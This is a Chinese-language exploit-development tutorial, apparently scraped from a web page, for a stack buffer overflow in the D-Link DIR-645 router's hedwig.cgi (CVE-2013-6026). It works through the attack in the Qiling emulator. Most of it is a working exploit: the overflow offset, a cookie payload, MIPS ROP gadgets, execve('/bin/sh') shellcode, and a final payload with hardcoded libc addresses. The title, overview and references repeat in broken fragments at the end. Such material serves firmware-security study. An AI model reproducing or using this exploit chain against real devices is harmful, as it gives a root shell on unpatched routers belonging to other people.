D-Link DIR-645 缓冲区溢出漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
本教学文档详细分析D-Link DIR-645路由器中的缓冲区溢出漏洞(CVE-2013-6026)，并展示如何使用Qiling框架进行漏洞分析和利用开发。<\/p>

漏洞位置<\/h3>

位于hedwigcgi_main<\/code>函数中<\/li>
漏洞触发点：sprintf(acStack1064,"%s\/%s\/postxml","\/runtime\/session",uVar2)<\/code><\/li>

缓冲区大小：char acStack1064 [1024]<\/code><\/li>
<\/ul>
2. 环境准备<\/h2>
所需工具<\/h3>

Qiling框架<\/li>
Ghidra反编译工具<\/li>
GDB调试器<\/li>
MIPS交叉编译工具链<\/li>
<\/ul>
固件分析环境搭建<\/h3>

提取路由器固件<\/li>
使用Qiling加载目标二进制文件：<\/li>
<\/ol>
from<\/span> qiling import<\/span> Qiling
<\/span><\/span>from<\/span> qiling.const import<\/span> QL_VERBOSE
<\/span><\/span>
<\/span><\/span>path =<\/span> ["\/htdocs\/web\/hedwig.cgi"<\/span>]
<\/span><\/span>rootfs =<\/span> "\/squashfs-root"<\/span>
<\/span><\/span>ql =<\/span> Qiling(path, rootfs, verbose=<\/span>QL_VERBOSE.<\/span>DEBUG)
<\/span><\/span><\/code><\/pre>3. 漏洞分析<\/h2>
漏洞成因<\/h3>

sess_get_uid()<\/code>获取用户控制的UID<\/li>
sobj_get_string()<\/code>将UID转换为字符串<\/li>
使用sprintf()<\/code>将字符串拼接到固定大小的缓冲区中，无长度检查<\/li>
<\/ol>
关键代码片段<\/h3>
sess_get_uid(iVar1);
<\/span><\/span>uVar2 =<\/span> sobj_get_string(iVar1);
<\/span><\/span>sprintf(acStack1064,"%s\/%s\/postxml"<\/span>,"\/runtime\/session"<\/span>,uVar2);
<\/span><\/span><\/code><\/pre>溢出计算<\/h3>

目标缓冲区地址：0x7ff3c1e0<\/code><\/li>
返回地址位置：0x7ff3c604<\/code> ($sp+0x4e4)<\/li>
偏移量计算：0x7ff3c604 - 0x7ff3c1e0 = 1060 bytes<\/code><\/li>
减去固定字符串长度：len("\/runtime\/session\/") = 17<\/code><\/li>
最终填充长度：1043 bytes<\/code><\/li>
<\/ul>
4. 漏洞利用开发<\/h2>
利用步骤<\/h3>

构造超长UID触发溢出<\/li>
覆盖返回地址控制执行流<\/li>
实现任意代码执行<\/li>
<\/ol>
基础利用代码<\/h3>
buffer =<\/span> "uid=<\/span>%s<\/span>"<\/span> %<\/span> ("A"<\/span> *<\/span> 1043<\/span>)
<\/span><\/span>buffer +=<\/span> "BBBB"<\/span>  # 覆盖返回地址<\/span>
<\/span><\/span>required_env =<\/span> {
<\/span><\/span>    "REQUEST_METHOD"<\/span>: "POST"<\/span>,
<\/span><\/span>    "HTTP_COOKIE"<\/span>: buffer
<\/span><\/span>}
<\/span><\/span>ql =<\/span> Qiling(path, rootfs, output=<\/span>"none"<\/span>, env=<\/span>required_env)
<\/span><\/span><\/code><\/pre>5. Qiling框架高级应用<\/h2>
系统调用模拟<\/h3>
# 自定义fork系统调用处理<\/span>
<\/span><\/span>def<\/span> hook_fork<\/span>(ql, *<\/span>args, **<\/span>kw):
<\/span><\/span>    pid =<\/span> os.<\/span>fork()
<\/span><\/span>    if<\/span> pid ==<\/span> 0<\/span>:
<\/span><\/span>        ql.<\/span>os.<\/span>child_processes =<\/span> True<\/span>
<\/span><\/span>    return<\/span> pid
<\/span><\/span>
<\/span><\/span>ql.<\/span>set_syscall(0xfa2<\/span>, hook_fork)  # MIPS_FORK_SYSCALL = 0xfa2<\/span>
<\/span><\/span>
<\/span><\/span># 自定义execve系统调用处理<\/span>
<\/span><\/span>def<\/span> execve_onenter<\/span>(ql, pathname, argv, envp, *<\/span>args):
<\/span><\/span>    ql.<\/span>reg.<\/span>a1 =<\/span> 0<\/span>
<\/span><\/span>    ql.<\/span>reg.<\/span>a2 =<\/span> 0<\/span>
<\/span><\/span>
<\/span><\/span>ql.<\/span>set_syscall(0xfab<\/span>, execve_onenter, QL_INTERCEPT.<\/span>ENTER)  # MIPS_EXECVE_SYSCALL = 0xfab<\/span>
<\/span><\/span><\/code><\/pre>内存操作<\/h3>
# 分配内存并写入字符串<\/span>
<\/span><\/span>cmd =<\/span> ql.<\/span>mem.<\/span>map_anywhere(20<\/span>)
<\/span><\/span>ql.<\/span>mem.<\/span>string(cmd, "\/bin\/sh"<\/span>)
<\/span><\/span>ql.<\/span>reg.<\/span>a0 =<\/span> cmd  # 设置第一个参数<\/span>
<\/span><\/span><\/code><\/pre>6. MIPS架构利用技术<\/h2>
MIPS调用约定<\/h3>

函数地址必须同时存储在\(ra和\)<\/span>t9寄存器中<\/li>
前4个参数通过\(a0-\)<\/span>a3传递<\/li>
返回值通过$v0传递<\/li>
<\/ol>
关键寄存器<\/h3>

$ra: 返回地址<\/li>
$t9: 函数指针<\/li>
\(a0-\)<\/span>a3: 函数参数<\/li>
$sp: 栈指针<\/li>
<\/ul>
7. ROP链构造<\/h2>
所需Gadget<\/h3>

Gadget 1<\/strong>: 调用sleep并跳转到$s5<\/li>
<\/ol>
0003<\/span>bc94<\/span> 03<\/span> 00<\/span> 04<\/span> 24<\/span> li<\/span> a0<\/span>,0x3<\/span>
<\/span><\/span>0003<\/span>bc98<\/span> 21<\/span> c8<\/span> c0<\/span> 03<\/span> move<\/span> t9<\/span>,s8<\/span>
<\/span><\/span>0003<\/span>bc9c<\/span> 09<\/span> f8<\/span> 20<\/span> 03<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0003<\/span>bca0<\/span> 21<\/span> 30<\/span> 00<\/span> 00<\/span> clear<\/span> a2<\/span>
<\/span><\/span>0003<\/span>bca4<\/span> 21<\/span> 28<\/span> 80<\/span> 02<\/span> move<\/span> a1<\/span>,s4<\/span>
<\/span><\/span>0003<\/span>bca8<\/span> 0<\/span>e<\/span> 00<\/span> 04<\/span> 24<\/span> li<\/span> a0<\/span>,0xe<\/span>
<\/span><\/span>0003<\/span>bcac<\/span> 21<\/span> c8<\/span> a0<\/span> 02<\/span> move<\/span> t9<\/span>,s5<\/span>
<\/span><\/span>0003<\/span>bcb0<\/span> 09<\/span> f8<\/span> 20<\/span> 03<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0003<\/span>bcb4<\/span> 21<\/span> 30<\/span> 00<\/span> 00<\/span> clear<\/span> a2<\/span>
<\/span><\/span><\/code><\/pre>
Gadget 2<\/strong>: 调整堆栈指针并将地址放入$s1<\/li>
<\/ol>
0004<\/span>dcb4<\/span> 28<\/span> 00<\/span> b1<\/span> 27<\/span> addiu<\/span> s1<\/span>,sp<\/span>,0x28<\/span>
<\/span><\/span>0004<\/span>dcb8<\/span> 21<\/span> 20<\/span> 60<\/span> 02<\/span> move<\/span> a0<\/span>,s3<\/span>
<\/span><\/span>0004<\/span>dcbc<\/span> 21<\/span> 28<\/span> 20<\/span> 02<\/span> move<\/span> a1<\/span>,s1<\/span>
<\/span><\/span>0004<\/span>dcc0<\/span> 21<\/span> c8<\/span> 00<\/span> 02<\/span> move<\/span> t9<\/span>,s0<\/span>
<\/span><\/span>0004<\/span>dcc4<\/span> 09<\/span> f8<\/span> 20<\/span> 03<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0004<\/span>dcc8<\/span> 01<\/span> 00<\/span> 06<\/span> 24<\/span> li<\/span> __name<\/span>,0x1<\/span>
<\/span><\/span><\/code><\/pre>
Gadget 3<\/strong>: 跳转到$s1指向的代码<\/li>
<\/ol>
0001<\/span>bb44<\/span> 21<\/span> c8<\/span> 20<\/span> 02<\/span> move<\/span> t9<\/span>,s1<\/span>
<\/span><\/span>0001<\/span>bb48<\/span> 09<\/span> f8<\/span> 20<\/span> 03<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0001<\/span>bb4c<\/span> 03<\/span> 00<\/span> 04<\/span> 24<\/span> li<\/span> __size<\/span>,0x3<\/span>
<\/span><\/span><\/code><\/pre>Shellcode构造<\/h3>
# MIPSEL execve("\/bin\/sh") shellcode<\/span>
<\/span><\/span>shellcode =<\/span> b<\/span>""<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xff\xff\x06\x28<\/span>"<\/span>  # slti $a2, $zero, -1<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\x62\x69\x0f\x3c<\/span>"<\/span>  # lui $t7, 0x6962<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\x2f\x2f\xef\x35<\/span>"<\/span>  # ori $t7, $t7, 0x2f2f<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xf4\xff\xaf\xaf<\/span>"<\/span>  # sw $t7, -0xc($sp)<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\x73\x68\x0e\x3c<\/span>"<\/span>  # lui $t6, 0x6873<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\x6e\x2f\xce\x35<\/span>"<\/span>  # ori $t6, $t6, 0x2f6e<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xf8\xff\xae\xaf<\/span>"<\/span>  # sw $t6, -8($sp)<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xfc\xff\xa0\xaf<\/span>"<\/span>  # sw $zero, -4($sp)<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xf4\xff\xa4\x27<\/span>"<\/span>  # addiu $a0, $sp, -0xc<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xff\xff\x05\x28<\/span>"<\/span>  # slti $a1, $zero, -1<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\xab\x0f\x02\x24<\/span>"<\/span>  # addiu;$v0, $zero, 0xfab<\/span>
<\/span><\/span>shellcode +=<\/span> b<\/span>"<\/span>\x0c\x01\x01\x01<\/span>"<\/span>  # syscall 0x40404<\/span>
<\/span><\/span><\/code><\/pre>最终Payload构造<\/h3>
buffer =<\/span> b<\/span>"uid=<\/span>%s<\/span>"<\/span> %<\/span> (b<\/span>"B"<\/span> *<\/span> 1003<\/span>)
<\/span><\/span>buffer +=<\/span> b<\/span>"AAAA"<\/span>
<\/span><\/span>buffer +=<\/span> pack("<I"<\/span>, calc_address(0x0001bb44<\/span>))  # Gadget #3<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"1111"<\/span>  # $s1<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"2222"<\/span>  # $s2<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"1111"<\/span>  # $s3<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"4444"<\/span>  # $s4<\/span>
<\/span><\/span>buffer +=<\/span> pack("<I"<\/span>, calc_address(0x0004dcb4<\/span>))  # Gadget #2<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"6666"<\/span>  # $s6<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"7777"<\/span>  # $s7<\/span>
<\/span><\/span>buffer +=<\/span> pack("<I"<\/span>, 0x77552bd0<\/span>)  # Sleep address<\/span>
<\/span><\/span>buffer +=<\/span> pack("<I"<\/span>, 0x77527c94<\/span>)  # Overwrites $ra with Gadget #1<\/span>
<\/span><\/span>buffer +=<\/span> b<\/span>"<\/span>\x26\x40\x08\x01<\/span>"<\/span> *<\/span> 30<\/span> +<\/span> shellcode  # NOP sled + shellcode<\/span>
<\/span><\/span><\/code><\/pre>8. 地址计算函数<\/h2>
def<\/span> calc_address<\/span>(addr_offset):
<\/span><\/span>    LIBC_BASE =<\/span> 0x774fc000<\/span>
<\/span><\/span>    return<\/span> LIBC_BASE +<\/span> addr_offset -<\/span> 0x10000<\/span>
<\/span><\/span><\/code><\/pre>9. 验证与测试<\/h2>
测试方法<\/h3>

使用Qiling运行漏洞利用代码<\/li>
观察系统调用执行情况<\/li>
验证shell是否成功启动<\/li>
<\/ol>
预期输出<\/h3>
nanosleep(0x7ff3c770, 0x7ff3c770) = 0
execve(\/\/bin\/sh,ioctl(0x0, 0x540d, 0x7ff3c8c8) = -1
ioctl(0x1, 0x540d, 0x7ff3c8c8) = -1
<\/code><\/pre>
10. 参考资料<\/h2>

Firmware Exploitation with JEB: Part 1<\/a><\/li>
Firmware Exploitation with JEB: Part 2<\/a><\/li>
MIPS ROP by haskal<\/a><\/li>
Damn Vulnerable Router Firmware (DVRF)<\/a><\/li>
MIPS ROP IDA Plugin<\/a><\/li>
Advanced SOHO Router Exploitation<\/a><\/li>
<\/ol>

D-Link DIR-645 缓冲区溢出漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2> 本教学文档详细分析D-Link DIR-645路由器中的缓冲区溢出漏洞(CVE-2013-6026)，并展示如何使用Qiling框架进行漏洞分析和利用开发。<\/p>

2. 环境准备<\/h2>

3. 漏洞分析<\/h2>

4. 漏洞利用开发<\/h2>

5. Qiling框架高级应用<\/h2>

6. MIPS架构利用技术<\/h2>

7. ROP链构造<\/h2>

9. 验证与测试<\/h2>

10. 参考资料<\/h2> Firmware Exploitation with JEB: Part 1<\/a><\/li> Firmware Exploitation with JEB: Part 2<\/a><\/li> MIPS ROP by haskal<\/a><\/li> Damn Vulnerable Router Firmware (DVRF)<\/a><\/li> MIPS ROP IDA Plugin<\/a><\/li> Advanced SOHO Router Exploitation<\/a><\/li> <\/ol>

1. 漏洞概述<\/h2>
本教学文档详细分析D-Link DIR-645路由器中的缓冲区溢出漏洞(CVE-2013-6026)，并展示如何使用Qiling框架进行漏洞分析和利用开发。<\/p>

10. 参考资料<\/h2>

Firmware Exploitation with JEB: Part 1<\/a><\/li>
Firmware Exploitation with JEB: Part 2<\/a><\/li>
MIPS ROP by haskal<\/a><\/li>
Damn Vulnerable Router Firmware (DVRF)<\/a><\/li>
MIPS ROP IDA Plugin<\/a><\/li>
Advanced SOHO Router Exploitation<\/a><\/li> <\/ol>